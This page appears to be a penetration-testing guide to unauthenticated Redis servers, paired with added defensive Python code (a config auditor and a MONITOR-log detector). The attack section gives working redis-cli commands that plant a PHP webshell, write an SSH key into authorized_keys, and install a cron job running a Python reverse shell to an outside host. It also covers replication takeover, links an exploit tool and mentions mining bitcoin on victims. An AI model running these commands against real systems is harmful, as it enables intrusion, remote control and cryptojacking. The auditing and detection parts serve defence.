Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker (description from redis.io).
Default port: 6379
PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 4.0.9
nmap --script redis-info -sV -p 6379 <IP>
msf> use auxiliary/scanner/redis/redis_server
Redis is frequently configured to be accessible without authentication. In that case you won't need any username or password. Connect to the Redis service and run the info command; it returns a lot of information about the server: the operating system it runs on, connected clients, memory usage and more.
Another interesting command to run is config get *. It returns many configuration strings related to the service, and one of them may reveal the home directory of the redis user (/var/lib/redis; another possible path is /home/redis/.ssh), and knowing this you know where you can write the
You can also use keys * to list the keys and get <key> to read their values.
sudo apt-get install redis-tools
redis-cli -h 192.168.0.24
192.168.0.24:6379> info
192.168.0.24:6379> CONFIG GET *
192.168.0.24:6379> keys *
192.168.0.24:6379> get 351115ba5f690fb9b1bdc1b41e673a94 #This is a key listed by the last command
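The same CONFIG GET * output that tells an attacker where to write is also the fastest way for an administrator to audit an instance. The Python example below is added here and is not code from the page or from the Redis project: it parses the numbered key/value listing redis-cli prints for CONFIG GET * and reports the settings that make the write-anywhere tricks on this page possible (no requirepass, protected-mode off, bind on all interfaces, dir or dbfilename already pointing somewhere suspicious). The sample output and the directory marker list are constructed assumptions.

```python
import re
from typing import Dict, List

# Constructed sample of what redis-cli prints for CONFIG GET * on a weakly
# configured instance (an assumption for this example, not output captured
# from any host on the page). redis-cli prints alternating key/value lines.
SAMPLE_CONFIG_GET = """\
 1) "dir"
 2) "/var/lib/redis"
 3) "dbfilename"
 4) "dump.rdb"
 5) "requirepass"
 6) ""
 7) "protected-mode"
 8) "no"
 9) "bind"
10) ""
11) "port"
12) "6379"
"""

# One numbered, double-quoted entry per line.
_ENTRY_RE = re.compile(r'^\s*\d+\)\s*"(.*)"\s*$')

# Directories the page shows being abused as RDB targets: a web root, an
# .ssh directory and the cron spool. The marker list is this example's choice.
SENSITIVE_DIR_MARKERS = ("/.ssh", "/html", "/www", "/cron")


def parse_config_get(text: str) -> Dict[str, str]:
    """Turn redis-cli's numbered CONFIG GET output into a {key: value} dict.
    Only the \\" and \\\\ escapes redis-cli emits are unescaped."""
    entries: List[str] = []
    for line in text.splitlines():
        m = _ENTRY_RE.match(line)
        if m:
            entries.append(m.group(1).replace('\\"', '"').replace("\\\\", "\\"))
    if len(entries) % 2:
        raise ValueError("odd number of entries: not a key/value listing")
    return dict(zip(entries[0::2], entries[1::2]))


def audit_config(cfg: Dict[str, str]) -> List[str]:
    """Return one finding per setting that enables the write-anywhere
    attacks on this page (unauthenticated CONFIG SET dir/dbfilename + SAVE)."""
    findings: List[str] = []
    if not cfg.get("requirepass"):
        findings.append("requirepass is empty: anyone reaching the port can run CONFIG SET")
    if cfg.get("protected-mode", "yes").lower() == "no":
        findings.append("protected-mode is off: remote unauthenticated clients are accepted")
    bind = cfg.get("bind", "")
    if bind == "" or any(b in ("0.0.0.0", "*", "::") for b in bind.split()):
        findings.append(f"bind is {bind!r}: Redis listens on all interfaces")
    d = cfg.get("dir", "")
    if any(mk in d for mk in SENSITIVE_DIR_MARKERS):
        findings.append(f"dir {d!r} points at a web root, .ssh or cron directory")
    fn = cfg.get("dbfilename", "")
    if fn and not fn.endswith(".rdb"):
        findings.append(f"dbfilename {fn!r} is not an .rdb file: a file may have been planted")
    return findings


if __name__ == "__main__":
    for finding in audit_config(parse_config_get(SAMPLE_CONFIG_GET)):
        print("FINDING:", finding)
```

Feed it the real output with something like redis-cli -h <host> CONFIG GET * | python3 audit.py after swapping SAMPLE_CONFIG_GET for sys.stdin.read(); an instance that is already compromised typically shows up in the dir/dbfilename findings even after the attacker has left.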
To exploit a misconfigured Redis you can try: https://github.com/Avinash-acid/Redis-Server-Exploit
You must know the path of the website folder:
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
OK
10.85.0.52:6379> config set dbfilename redis.php
OK
10.85.0.52:6379> set test "<?php phpinfo(); ?>"
OK
10.85.0.52:6379> save
OK
If accessing the webshell throws an error, back up the database, empty it and try again; remember to restore the database afterwards.
Generate an SSH public/private key pair on your PC:
ssh-keygen -t rsa
Write the public key to a file:
(echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt
Import the file into Redis:
cat foo.txt | redis-cli -h 10.85.0.52 -x set crackit
Save the public key to the authorized_keys file on the Redis server:
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /home/test/.ssh/
OK
10.85.0.52:6379> config set dbfilename "authorized_keys"
OK
10.85.0.52:6379> save
OK
Finally, you can ssh to the Redis server with the private key: ssh -i id_rsa email@example.com
root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK
The last example is for Ubuntu; for CentOS, the config set dir command above should be:
redis-cli -h 10.85.0.52 config set dir /var/spool/cron/
This method can also be used to earn bitcoin (see: yam).
All write operations on a master Redis are automatically replicated to its slaves. This means we can make the vulnerable Redis a slave of a master Redis that we control, and then enter commands on our own Redis to have them replicated to the target.
master redis: 10.85.0.51 (Hacker's server)
slave redis: 10.85.0.52 (target vulnerable server)
A master-slave connection is established from the slave redis to the master redis:
redis-cli -h 10.85.0.52 -p 6379
slaveof 10.85.0.51 6379
Then you can log in to the master redis to control the slave redis:
redis-cli -h 10.85.0.51 -p 6379
set mykey hello
set mykey2 helloworld
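All four techniques above (webshell, SSH key, cron job and replication takeover) go through a very small set of commands: CONFIG SET dir, CONFIG SET dbfilename, SAVE/BGSAVE and SLAVEOF/REPLICAOF. That makes the chain easy to spot in MONITOR output or in a proxy log of the same shape. The Python detector below is an added example, not code from the page or from the Redis project: it parses MONITOR lines, remembers per connection whether the RDB target was moved, and raises an alert for each step of the chain, plus for stored values that look like a PHP file, an SSH public key or a crontab line. The sample MONITOR lines, the directory markers and the content markers are constructed assumptions (the cron payload in the sample is a placeholder string, not the page's command).

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed MONITOR output (an assumption for this example, not traffic
# captured from the hosts on the page). The shape is the one Redis MONITOR
# really prints: <timestamp> [<db> <client ip:port>] "CMD" "arg" ...
SAMPLE_MONITOR = r'''
1700000000.000100 [0 10.0.0.7:41000] "GET" "session:abc"
1700000001.000200 [0 10.85.0.53:51234] "CONFIG" "SET" "dir" "/usr/share/nginx/html"
1700000001.100300 [0 10.85.0.53:51234] "CONFIG" "SET" "dbfilename" "redis.php"
1700000001.200400 [0 10.85.0.53:51234] "SET" "test" "<?php phpinfo(); ?>"
1700000001.300500 [0 10.85.0.53:51234] "SAVE"
1700000002.000600 [0 10.0.0.7:41000] "SET" "session:abc" "value"
1700000003.000700 [0 10.85.0.53:51240] "CONFIG" "SET" "dir" "/var/spool/cron/crontabs/"
1700000003.100800 [0 10.85.0.53:51240] "CONFIG" "SET" "dbfilename" "root"
1700000003.200900 [0 10.85.0.53:51240] "SET" "1" "\n\n*/1 * * * * /bin/sh -c CONSTRUCTED_COMMAND\n\n"
1700000003.300000 [0 10.85.0.53:51240] "SAVE"
1700000004.000000 [0 10.85.0.53:51250] "SLAVEOF" "10.85.0.51" "6379"
1700000005.000000 [0 10.0.0.9:41100] "BGSAVE"
'''

MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # one double-quoted argument

# Where the page shows RDB files being dropped, and what the planted
# payloads look like. Both lists are this example's own choice.
SENSITIVE_DIR_MARKERS = ("/.ssh", "/html", "/www", "/cron")
PLANTED_CONTENT_MARKERS = ("<?php", "ssh-rsa", "ssh-ed25519", "* * * *")


@dataclass
class ClientState:
    """Per-connection memory: did this client move the RDB target?"""
    dir_changed: bool = False
    dbfilename_changed: bool = False


def parse_monitor_line(line: str) -> Optional[Tuple[str, str, List[str]]]:
    """Return (timestamp, client, args) for a MONITOR line, else None."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    args = [a.replace('\\"', '"') for a in ARG_RE.findall(m.group("rest"))]
    return (m.group("ts"), m.group("client"), args) if args else None


def detect(lines: List[str]) -> List[str]:
    """Flag the command chain behind the file-write and replication tricks."""
    alerts: List[str] = []
    state: Dict[str, ClientState] = {}
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        ts, client, args = parsed
        cmd = args[0].upper()
        sub = args[1].upper() if len(args) > 1 else ""
        st = state.setdefault(client, ClientState())
        if cmd == "CONFIG" and sub == "SET" and len(args) >= 4:
            param, value = args[2].lower(), args[3]
            if param == "dir":
                st.dir_changed = True
                sensitive = any(mk in value for mk in SENSITIVE_DIR_MARKERS)
                where = " (web root/.ssh/cron)" if sensitive else ""
                alerts.append(f"{ts} {client}: CONFIG SET dir {value!r}{where}")
            elif param == "dbfilename":
                st.dbfilename_changed = True
                kind = "name" if value.endswith(".rdb") else "non-.rdb name"
                alerts.append(f"{ts} {client}: CONFIG SET dbfilename to {kind} {value!r}")
        elif cmd in ("SAVE", "BGSAVE") and (st.dir_changed or st.dbfilename_changed):
            alerts.append(f"{ts} {client}: {cmd} after dir/dbfilename change: RDB written outside the data dir")
        elif cmd in ("SLAVEOF", "REPLICAOF") and sub != "NO" and len(args) >= 3:
            alerts.append(f"{ts} {client}: replication pointed at {args[1]}:{args[2]}")
        elif cmd in ("SET", "SETEX", "APPEND") and len(args) >= 3:
            if any(mk in a for a in args[2:] for mk in PLANTED_CONTENT_MARKERS):
                alerts.append(f"{ts} {client}: value for key {args[1]!r} looks like a planted file body")
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_MONITOR.splitlines()):
        print("ALERT:", alert)
```

MONITOR is expensive on a busy instance, so this belongs on a proxy or a short sampling window rather than running permanently. The precondition for every step is that an unauthenticated client can run CONFIG and SLAVEOF at all; setting requirepass and bind, and disabling or renaming CONFIG with rename-command (or Redis 6+ ACLs), removes it, and the detector is for instances where that has not happened yet.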